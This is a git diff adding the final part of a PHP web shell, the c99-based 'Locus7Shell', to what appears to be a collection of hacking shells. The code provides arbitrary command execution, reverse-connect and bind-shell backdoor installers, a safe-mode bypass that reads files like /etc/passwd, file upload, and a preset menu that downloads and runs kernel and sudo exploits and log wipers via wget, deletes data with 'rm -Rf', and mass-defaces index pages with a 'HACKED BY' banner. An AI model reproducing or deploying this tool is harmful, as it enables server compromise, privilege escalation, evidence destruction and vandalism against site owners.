+"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". +"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". +"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". +"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". +"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". +"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". +"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". +"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". +"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". +"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". +"Ow==", +"ext_doc"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". +"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". +"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", +"ext_exe"=> +"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". +"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". +"xhIAOw==", +"ext_h"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". +"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". +"Wq/NknbbSgAAOw==", +"ext_hpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". +"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". +"UqUagnbLdZa+YFcCADs=", +"ext_htaccess"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". +"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". +"AAA7", +"ext_html"=> +"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". +"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". +"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". +"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". +"ADs=", +"ext_jpg"=> +"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". +"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". +"FxEAOw==", +"ext_js"=> +"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". +"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". +"a00AjYYBbc/o9HjNniUAADs=", +"ext_lnk"=> +"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". +"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". +"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". +"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". +"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". +"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". +"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". +"ADs=", +"ext_log"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". +"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", +"ext_php"=> +"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". +"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", +"ext_pl"=> +"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". +"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", +"ext_swf"=> +"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". +"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". +"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". +"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", +"ext_tar"=> +"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". +"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". +"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". +"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". +"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". +"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". +"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". +"u4tLAgEAOw==", +"ext_txt"=> +"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". +"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". +"UpPWG3Ig6Hq/XmRjuZwkAAA7", +"ext_wri"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". +"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", +"ext_xml"=> +"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". +"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". +"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". +"IQA7" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} + natsort($images); + $k = array_keys($images); + echo "<center>"; + foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} + echo "</center>"; + } + exit; +} +if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>"); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST> +Bind Port: <input type='text' name='backconnectport' value='5992'> +<input type='hidden' name='use' value='shbd'> +<input type='submit' value='Install Backdoor'></form>"); +echo("$msg"); +echo("$emsg"); +echo("</center>"); +} ?> +</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> +<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Useful Commands + </div> + <form action="<?php echo $surl; ?>"> + <div align="center"> + <input type=hidden name=act value="cmd"> + <input type=hidden name="d" value="<?php echo $dispd; ?>"> + <SELECT NAME="cmd"> + <OPTION VALUE="uname -a">Kernel version + <OPTION VALUE="w">Logged in users + <OPTION VALUE="lastlog">Last to connect + <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins + <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! + <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? + <OPTION VALUE="which wget curl w3m lynx">Downloaders? + <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO + <OPTION VALUE="netstat -atup | grep IST">Open ports + <OPTION VALUE="locate gcc">gcc installed? + <OPTION VALUE="rm -Rf">Format box (DANGEROUS) + <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) + <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 + <OPTION VALUE="./zap2">WIPELOGS PT3 + <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) + <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) + <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) + <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) + <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) + <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) + <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow + <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit + <OPTION VALUE="./sudosploit">Execute Sudosploit + <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c + <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c + <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c + <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner + <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner + <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner + <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement + </SELECT> + <input type=hidden name="cmd_txt" value="1"> + &nbsp; + <input type=submit name=submit value="Execute"> + <br> + Warning. Kernel may be alerted using higher levels </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> + <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> + <input type="hidden" name="client" value="firefox-a"> + <input type="hidden" name="rls" value="org.mozilla:en-US:official"> + <input type="hidden" name="hl" value="en"> + <input type="hidden" name="hs" value="b7p"> + <input type=submit name="btnG" VALUE="Search"> + </form></center> + </td> +</tr></TABLE><br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr><td height="1" valign="top" colspan="2"></td></tr> +<tr> + <td width="50%" height="83" valign="top"><center> + <div align="center">Php Safe-Mode Bypass (Read Files) + </div><br> + <form action="<?php echo $surl; ?>"> + <div align="center"> + File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> + + + + + + + <? + + function rsg_read() + { + $test=""; + $temp=tempnam($test, "cx"); + $file=$_GET['file']; + $get=htmlspecialchars($file); + echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>"; + if(copy("compress.zlib://".$file, $temp)){ + $fichier = fopen($temp, "r"); + $action = fread($fichier, filesize($temp)); + fclose($fichier); + $source=htmlspecialchars($action); + echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>"; + unlink($temp); + } else { + die("<FONT COLOR=\"RED\"><CENTER>Sorry... File + <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have + access.</CENTER></FONT>"); + } + echo "</div>"; + } + + if(isset($_GET['file'])) +{ +rsg_read(); +} + + ?> + + <? + + function rsg_glob() +{ +$chemin=$_GET['directory']; +$files = glob("$chemin*"); +echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>"; +foreach ($files as $filename) { + echo "<pre>"; + echo "$filename\n"; + echo "</pre>"; +} +} + +if(isset($_GET['directory'])) +{ +rsg_glob(); +} + +?> + + <br> + </div> + </form> + </td> + <td width="50%" height="83" valign="top"><center> + <center>Php Safe-Mode Bypass (List Directories): <form action="<?php echo $surl; ?>"> + <div align="center"><br> + Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> + + </form></center> + </td> +</tr></TABLE> + + + + + + + + + + + + + + + + + + + + + + + + + + +<br> +<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> +<tr> + <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1" checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> + <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> +</tr> +</table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> +<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^ | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> +</body></html><?php chdir($lastdir); c99shexit(); ?> \ No newline at end of file diff --git a/php/PHPshell/c99_locus7s/c99_locus7s2.jpg b/php/PHPshell/c99_locus7s/c99_locus7s2.jpg new file mode 100644 index 0000000..12e3902 Binary files /dev/null and b/php/PHPshell/c99_locus7s/c99_locus7s2.jpg differ diff --git a/php/PHPshell/c99_w4cking/c99_w4cking.jpg b/php/PHPshell/c99_w4cking/c99_w4cking.jpg new file mode 100644 index 0000000..86a1d2c Binary files 